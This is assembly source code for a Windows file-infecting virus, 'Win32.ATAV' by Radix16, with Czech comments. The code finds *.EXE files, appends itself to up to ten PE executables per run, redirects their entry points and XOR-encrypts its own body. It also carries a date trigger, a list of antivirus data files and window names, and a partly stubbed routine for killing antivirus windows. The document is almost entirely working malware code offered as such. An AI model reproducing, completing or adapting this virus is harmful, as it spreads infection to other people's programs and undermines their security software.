;-------------------------------
;Fuck Beta virus Atav by Radix16
;-------------------------------
;Tak tohle je mozna prvni verze viru Atav ,nevim to jiste protoze se mi gdesi stratila.
;Sami negdy uvidite zdrojak plne verze se hodne lisi s timhle TOHLE JE LAMME fuj!
;Uz se na toto nemuzu ani divat ,nestojito ani za popis :)
;
;Nova verze mela by obsahovat : Poly , Update Internet , Fast infection .Ring3 -> Ring0
;Takgze i nejake novinky pro svet :) ,ale jinac se presouvam i na LINUX :)))
; 
;Zatim Zdar :)


.386p
.Model Flat
jumps

.Data

db ?

extrn GetModuleHandleA :proc
extrn ExitProcess :proc

extrn MessageBoxA :proc

VirusSize equ Virus_End-Start
SizeCrypt equ Crypt_End-Crypto

include mz.inc                                  
include pe.inc                                 ;include files from Jacky Qwerty/29A
include win32api.inc
include useful.inc
;////////////////////////////M Y  C O D E ///////////////////////////////////////////////////////
.Code
				Virus_Size equ Virus_End-Start

Start:
	pushad	
	@SEH_SetupFrame <jmp seh_fn>
	xchg [edx], eax                 

seh_fn:	

	call Base1
			 		
Base1:
	pop ebp
	sub ebp,offset Base1
					FirstGeneration:	
call Mutate1
			 Crypto:

Virus_Start:
	
	call Kernel?

	mov esi, ebx                 
       	mov ebx,[esi+10h]                
       	add ebx,[ebp + imagebase]	
	mov [ebp + offset f_RVA],ebx
	mov eax,[esi] 
	jz Not_Found_Kernel32
	
	mov esi,[esi]                   
       	add esi,[ebp + offset imagebase]               
       	mov edx,esi                     
       	mov ecx,[ebp+offset importsize]
       	mov eax,0    

	Jmp Get_Module_Handle

coded db 'Win32.ATAV (c)oded by Radix16[MIONS]',0	
maintext db 'Heayaaa',0
Kernel?:

	mov esi,[ebp + offset imagebase]
	cmp word ptr[esi],'ZM'
	jne GetEnd	
	
	add esi,3ch
	mov esi,[esi]
	add esi,[ebp + offset imagebase]
	push esi
	cmp word ptr [esi], 'EP'       ;Win App  PE
	jne GetEnd
	
	add esi, 28h                  
       	mov eax, [esi] 
	mov [ebp+entrypoint], eax 
	pop esi
	add esi,80h 
	mov eax,[esi] 
	mov [ebp+importvirtual],eax
	mov eax,[esi+4]
	mov [ebp+importsize],eax
	mov esi,[ebp+importvirtual]
	add esi,[ebp + offset imagebase]
	mov ebx,esi
	mov edx,esi
	add edx,[ebp + importsize]
Search_Kernel:	
        mov esi,[esi + 0ch]
	add esi,[ebp + offset imagebase]
	cmp [esi],swKernel32
	Je K32Found
	add ebx, 14h                  
        mov esi, ebx    
        cmp esi, edx             
        jg Not_Found_Kernel32       
        jmp Search_Kernel  

K32Found:
	ret

Not_Found_Kernel32:
	mov eax, dword ptr [esp]         
                                
find_base_loop:                       
       	cmp dword ptr [eax+0b4h], eax 
       	je Found_Adress      
       	dec eax             
       	cmp eax, 40000000h  
       	jbe assume_hardcoded     
       	jmp find_base_loop
              
assume_hardcoded:                 
      	mov eax, 0BFF70000h          
      	cmp word ptr [eax], 'ZM'       
      	je Found_Adress                       
      	mov eax, 07FFF0000h

Found_Adress:
	mov [ebp+offset Kernel32], eax     ;Mam ju :))
	mov edi, eax
	cmp word ptr [edi],'ZM'         
      	jne GetEnd 
	mov edi, [edi+3ch]                
      	add edi, [ebp+offset Kernel32]   
      	cmp word ptr [edi],'EP'
	jne GetEnd

	pushad

	mov esi,[edi+78H]                 
      	add esi,[ebp+offset Kernel32]     
      	mov [ebp+offset Export],esi       
      	add esi,10H                      
      	lodsd                            
      	mov [ebp+offset basef],eax        
      	lodsd                             
      	lodsd                              
      	mov [ebp+offset limit],eax      
      	add eax, [ebp+offset Kernel32]     
      	lodsd                            
      	add eax,[ebp+offset Kernel32]     
      	mov [ebp+offset AddFunc],eax     
      	lodsd                            
      	add eax, [ebp+offset Kernel32]   
      	mov [ebp+offset AddName],eax     
      	lodsd                              
      	add eax,[ebp+offset Kernel32]     
      	mov [ebp+offset AddOrd],eax     
      	mov esi,[ebp+offset AddFunc]      
      	lodsd                              
	add eax,[ebp+offset Kernel32]
	
	mov esi, [ebp+offset AddName]    
      	mov [ebp+offset Nindex], esi      
      	mov edi,[esi]                    
      	add edi,[ebp+offset Kernel32]    
      	mov ecx,0                        
      	mov ebx,offset API_NAMES          
      	add ebx,ebp   

TryAgain:                               
      	mov esi,ebx  
MatchByte:                               
      	cmpsb                             
      	jne NextOne                     
                                        
      	cmp byte ptr [edi], 0             
      	je GotIt                          
      	jmp MatchByte                     
                                         
NextOne:                                 
     	inc cx                              
     	cmp cx, word ptr [ebp+offset limit] 
     	jge GetEnd

	add dword ptr [ebp+offset Nindex], 4
     	mov esi, [ebp+offset Nindex]        
     	mov edi, [esi]                     
     	add edi, [ebp+offset Kernel32]      
     	jmp TryAgain 

GotIt:
      	mov ebx,esi                    
      	inc ebx                          
      	shl ecx,1  

	mov esi, [ebp+offset AddOrd]     
      	add esi,ecx                     
      	xor eax,eax                    
      	mov ax,word ptr [esi]         
      	shl eax, 2                      
      	mov esi,[ebp+offset AddFunc]     
      	add esi,eax                      
      	mov edi,dword ptr [esi]         
      	add edi,[ebp+offset Kernel32]   

       	mov [ebp+offset ddGetProcAddress], edi  
      	popad                                
	
	mov esi, offset swExitProcess      
      	mov edi, offset ddExitProcess     
      	add esi, ebp                     
      	add edi, ebp

Repeat_find_apis:                      
      	push esi                       
      	mov eax,[ebp+offset Kernel32]    
      	push eax                          
      	mov eax,[ebp+offset ddGetProcAddress]
      	call eax                         
      	cmp eax,0                       
      	je GetEnd                        
      	stosd                          
                                      
repeat_inc:                           
      	inc esi                         
      	cmp byte ptr [esi], 0             
      	jne repeat_inc                    
      	inc esi                          
      	cmp byte ptr [esi], 0FAh         
      	jne Repeat_find_apis          
 
	Jmp Virus_Game	
      
Get_Module_Handle:
	cmp dword ptr [edx],0             
      	je  Not_Found_Kernel32                     
      	cmp byte ptr [edx+3],80h
	je Not_Here 
	mov esi,[edx]                     
      	push ecx                         
      	add esi,[ebp + offset imagebase]               
      	add esi,2	
	mov edi,offset gmhGetModuleHandleA              
      	add edi,ebp                       
      	mov ecx,gmhsize          
      	rep cmpsb                        
      	pop ecx       
	je  f_GetModuleHandelA
Not_Here:
	inc eax                          
      	add edx,4                       
      	loop Get_Module_Handle
	jmp Not_Found_Kernel32
f_GetModuleHandelA:
	shl eax,2                        
      	mov ebx,[ebp+offset f_RVA]  
      	add eax,ebx                     
      	mov eax,[eax]                   

      	mov edx,offset se_Kernel32	            
      	add edx,ebp                    
      	push edx                          
      	call eax                         
      	cmp eax,0	
	jne Found_Adress
	Jmp Not_Found_Kernel32


Virus_Game:
	push offset SystemTime
	mov eax,[ebp + ddGetSystemTime]
	call eax 

	cmp byte ptr [SystemTime.wMonth],0Ah
	jne Next_Game
	cmp byte ptr [SystemTime.wDay],0Fh
	jne Next_Game
	
	jmp Ok_Day_Month

Next_Game:
	mov dword ptr [ebp+offset infections], 0Ah
	   
	call SearchFiles
	inc eax
	jz GetEnd
	dec eax
	push eax
	mov ecx,[edi.FileSizeLow] ;zisti velikost souboru
	lea esi,[edi.FileName]         
	call Infect
	jc _try 
      	dec dword ptr [ebp+offset infections]
      	cmp word ptr [ebp+offset infections], 0
      	je All_Done  
_try:	
	push edi      
      	lea edi, [edi.FileName] 
      	mov ecx, 13d
      	mov al, 0  
      	rep stosb 
      	pop edi 
      	pop eax
      	push eax 
      	push edi
      	push eax 
      	call dword ptr [ebp+offset ddFindNextFileA]
	test eax,eax 
      	jz All_Done
	mov ecx,[edi.FileSizeLow] ;zisti velikost souboru
	lea esi,[edi.FileName]    
	call Infect
	jc failinfection   
        dec dword ptr [ebp+infections]  
failinfection:                        
      	cmp dword ptr [ebp+infections], 0  
      	jne _try 

All_Done:
	pop eax
GetEnd:
	cmp ebp, 0                        
      	je _exit                       
      	mov eax,[ebp + offset oldip]       
      	add eax,[ebp + offset imagebase]                
      	jmp eax
_exit:                              
      	push 0                          
      	mov eax, [ebp+offset ddExitProcess]
      	call eax 
	
	

PEheader dd 0    
oldip dd 0
oldsize dd 0 
newsize dd 0                
incsize dd 0
newip dd 0

Infect  proc	
	
	pushad
	add ecx,VirusSize ;pricti virus k souboru
	mov word ptr [ebp+infectionflag], 0 
	mov [ebp + offset memory],ecx ; nastav max velikost pro mapovani souboru
	call OpenFile                 ;volej funkci pro otevreni souboru
	mov [ebp+offset filehandle], eax ; 
	inc eax                    ; eax -1
	jz Endus		    ; chyba? jestli ne tak jed dal	
	call CMapFile
	or eax,eax
	jz Endus
	call MapView
	or eax,eax
	jz Exit_Map
	mov esi,eax
	mov [ebp+offset mapaddress],esi
	
	cmp word ptr[esi],'ZM'    ;Zacina typickymi znaky jako EXE
	jne UnMapw
		
	
	mov ebx,dword ptr[esi+3ch]
	cmp word ptr [esi+ebx],'EP'	;Je to PE
	jne UnMapw
	add esi,ebx
	mov [PEheader+ebp], esi
	mov eax, [esi+28h]
	mov [oldip+ebp],eax      ;Uloz skok
	mov eax,[esi+3ch]	
	push eax 
	xor eax, eax
	mov ebx,[esi+74h]
	shl ebx,3  
	mov ax,word ptr [esi+6h]
	dec eax
	mov ecx,28h             
      	mul ecx 
	add esi,78h 
      	add esi,ebx 
      	add esi,eax
	
	or dword ptr ds:[esi+24h],0A0000020h
	
	mov eax,[esi+10h]
	mov [oldsize+ebp],eax
	add dword ptr [esi+8h],VirusSize

	mov eax,[esi+8h]
	pop ebx
	mov ecx,ebx
	div ecx
	mov ecx,ebx
	sub ecx,edx
	mov [esi+10h],ecx
	mov eax,[esi+8h] 
	add eax,[esi+10h]
      	mov [esi+10h],eax
	mov [ebp+offset newsize], eax 

	mov eax,[esi+0ch]               
      	add eax,[esi+8h]                 
      	sub eax,VirusSize                      
      	mov [newip+ebp],eax

	mov eax,[ebp+offset oldsize]    
      	mov ebx,[ebp+offset newsize]       
      	sub ebx,eax                          
      	mov [ebp+offset incsize], ebx       
                                             
      	mov eax,[esi+14h]                  
      	add eax,[ebp+offset newsize]      
      	mov [ebp+offset newfilesize], eax
	
	mov eax, [esi+14h]                    
      	add eax,[esi+8h]                   
      	sub eax,VirusSize                     
      	add eax,[ebp+offset mapaddress]      
                                           
      	call Write_File
		
	mov esi,[ebp+offset PEheader]
	mov eax,[newip+ebp]
	mov [esi+28h],eax 
	mov eax, [ebp+offset incsize]  
      	add [esi+50h], eax 

UnMapw:
	push dword ptr [ebp+offset mapaddress] 
      	mov eax, [ddUnmapViewOfFile+ebp]      
      	Call eax
	
Exit_Map:
	push dword ptr [ebp+offset maphandle]
	mov eax,[ddCloseHandle+ebp]
	call eax	
	
	push dword ptr [ebp+offset filehandle]
      	mov eax, [ddCloseHandle+ebp]         
      	call eax  
	Jmp Complete?
infection_error:
	stc
      	jmp Endus  
Complete?:
	cmp word ptr [ebp+offset infectionflag], 0FFh
      	je infection_error
	clc   
	
Endus:
	popad
	ret
Infect endp



SearchFilesN proc
	
    	ret
SearchFilesN endp

SearchFiles proc
	lea edi,[ebp + offset search]
      	mov eax,edi 
      	push eax
      	lea eax,[ebp + offset _Exe]
      	push eax
      	call dword ptr[ebp+offset ddFindFirstFileA]	    
	ret
SearchFiles endp

memory dd 0
maphandle dd 0
mapaddress dd 0

CMapFile proc
	push 0
        push dword ptr [ebp+offset memory]  ; max.velikost
        push 0
        push PAGE_READWRITE  ;R/W
	push 0
	push dword ptr [ebp+offset filehandle]  ;handle
	mov eax,dword ptr [ddCreateFileMappingA+ebp]
	call eax
	mov [ebp+offset maphandle], eax  ;uloz map.handle
	ret
CMapFile endp

MapView proc
	push dword ptr [ebp+offset memory]
 	push 0
        push 0
        push FILE_MAP_ALL_ACCESS
        push eax 
 	mov eax,[ddMapViewOfFile+ebp]  
      	call eax
	ret                     
MapView endp

filehandle dd 0     ;rukojet souboru

OpenFile proc
	push 0           ;Atributy                    
	push 0                               
      	push 3           ;Otevri existuji soubor                
      	push 0                               
      	push 1                             
      	push 80000000h or 40000000h          ;read a write
      	push esi                             ;jmeno souboru
      	mov eax, [ddCreateFileA+ebp]   ;
      	Call eax                          ;volej
	ret		;zpet
OpenFile endp   ;v eax je rukojet souboru


Kick_AV proc
	push eax                   
        cdq                            
        push edx                     
;            call FindWindowA              
        xchg eax, ecx                
        jecxz quit                    

        push edx                    
        push edx                      
        push 12h                       
        push ecx                       
;       call PostMessageA               
quit:
	ret

Kick_AV endp


Delete_AV proc



Delete_AV endp



Ok_Day_Month:
	


;////////////////D A T A ////////////////////////////////////////////////////////////////////////



	nop
	imagebase dd 00400000h 
	swKernel32 = 'NREK'
	Kernel32 dd 00000000h  
	importvirtual dd ?               
	importsize dd ?     
	entrypoint dd ?
	f_RVA dd ?
	Nindex dd 0   
	basef dd 0
	Export dd 0
	limit dd 0
	
	AddFunc dd 0                  
	AddName dd 0                    
	AddOrd dd 0     
	 
	                 
	             
	newfilesize dd 0               
	
	infectionflag dw 0
	gmhGetModuleHandleA db 'GetModuleHandleA',0
	gmhsize = $-gmhGetModuleHandleA

API_NAMES:
	swGetProcAddress db 'GetProcAddress',0        
	swExitProcess db 'ExitProcess',0         
	swGetVersion db 'GetVersion',0
	swFindFirstFileA db 'FindFirstFileA',0        
	swFindNextFileA db 'FindNextFileA',0        
	swGetCurrentDirectory db 'GetCurrentDirectoryA',0 
	swSetCurrentDirectory db 'SetCurrentDirectoryA',0
	swDeleteFile db 'DeleteFileA',0
	swCreateFileMapping db 'CreateFileMappingA',0    
	swMapViewOfFile db 'MapViewOfFile',0         
	swUnmapViewOfFile db 'UnmapViewOfFile',0      
	swGetFileAttributes db 'GetFileAttributesA',0   
	swSetFileAttributes db 'SetFileAttributesA',0    
	swGetDriveType db 'GetDriveTypeA',0        
	swCreateFile db 'CreateFileA',0          
	swCloseHandle db 'CloseHandle',0           
	swGetFileTime db 'GetFileTime',0         
	swSetFileTime db 'SetFileTime',0         
	swSetFilePointer db 'SetFilePointer',0        
	swGetFileSize db 'GetFileSize',0         
	swSetEndOfFile db 'SetEndOfFile',0         
	swGetSystemTime db 'GetSystemTime',0        
	swGetModuleHandle db 'GetModuleHandleA',0 	
	swWriteFile db 'WriteFile',0
db 0FAh

	ddGetProcAddress dd 0                        
	ddExitProcess dd 0                        
	ddGetVersion dd 0
	ddFindFirstFileA dd 0                        
	ddFindNextFileA dd 0                        
	ddGetCurrentDirectoryA dd 0                        
	ddSetCurrentDirectoryA dd 0
	ddDeleteFileA dd 0
 	ddCreateFileMappingA dd 0                        
	ddMapViewOfFile dd 0                        
	ddUnmapViewOfFile dd 0                        
	ddGetFileAttributesA dd 0                        
	ddSetFileAttributesA dd 0                        
	ddGetDriveTypeA dd 0                        
	ddCreateFileA dd 0                        
	ddCloseHandle dd 0                        
	ddGetFileTime dd 0                        
	ddSetFileTime dd 0                        
	ddSetFilePointer dd 0                        
	ddGetFileSize dd 0                        
	ddSetEndOfFile dd 0                         
	ddGetSystemTime dd 0                        
	ddGetModuleHandleA dd 0  
	ddWriteFile dd 0     


max_path EQU 260                               

se_Kernel32 db 'KERNEL32.dll',0

Anti_AV:


_Grisoft db 'avg?????.dat',0
_AVP db 'AVP.CRC',0         
_TBAW db 'anti-vir.dat',0							
_MSAV db 'CHKLIST.MS',0 

     
_Kaspersky_ db 'AVP Monitor',0
_Grisoft_ db 'AVG Control Center',0	


_Exe db '*.EXE',0
infections dd 0   
                  
      
fnx dd 0



Crypt_End:
 
Mutate1:
	
	mov ecx,SizeCrypt	
	lea esi,[ebp + Crypto]
decr:
	xor dword ptr [esi],0FFh
	inc esi
	loop decr	 
End_Mutate: 
       	ret

Write_File proc
	call Mutate1 	
	mov edi, eax                          
      	lea esi,[Start+ebp]                
      	mov ecx, VirusSize                   
      	rep movsb   
	call Mutate1	
	ret
Write_File endp


Virus_End:


SYSTEMTIME struct
  
  	wYear                 WORD    ?       
  	wMonth                WORD    ?       
  	wDayOfWeek            WORD    ?     
  	wDay                  WORD    ?     
  	wHour                 WORD    ?       
  	wMinute               WORD    ?      
  	wSecond               WORD    ?     
	wMilliseconds         WORD    ?      
ends                                                

filetime                        STRUC
	FT_dwLowDateTime        DD ?
        FT_dwHighDateTime       DD ?
filetime                        ENDS 

win32_find_data                 STRUC     
        FileAttributes          DD ?        
        CreationTime            filetime ?       
        LastAccessTime          filetime ?      
        LastWriteTime           filetime ?      
        FileSizeHigh            DD ?       
        FileSizeLow             DD ?      
        Reserved0               DD ?          
        Reserved1               DD ?          
        FileName                DB max_path DUP (?) 
        AlternateFileName       DB 13 DUP (?)     
                                DB 3 DUP (?)      
win32_find_data                 ENDS            

                                                   
search	win32_find_data ?
SystemTime SYSTEMTIME <>
	
	windir db 128h dup(0)             
       	sysdir db 128h dup(0)           
       	crtdir db 128h dup(0)            

Virtual_End:



First_Gen:
pushad
call Next_Gen

Next_Gen:
pop ebp
sub ebp,offset Next_Gen

mov ecx,SizeCrypt	
lea esi,[ebp + Crypto]
decri:
xor dword ptr [esi],0FFh
inc esi
loop decri	 


push 0
push offset TextF
push offset TextF1
push 0
call MessageBoxA

popad
Jmp Start


TextF db 'Win32.ATAV by Radix16[MIONS]',0
TextF1 db 'First generation sample',0

End First_Gen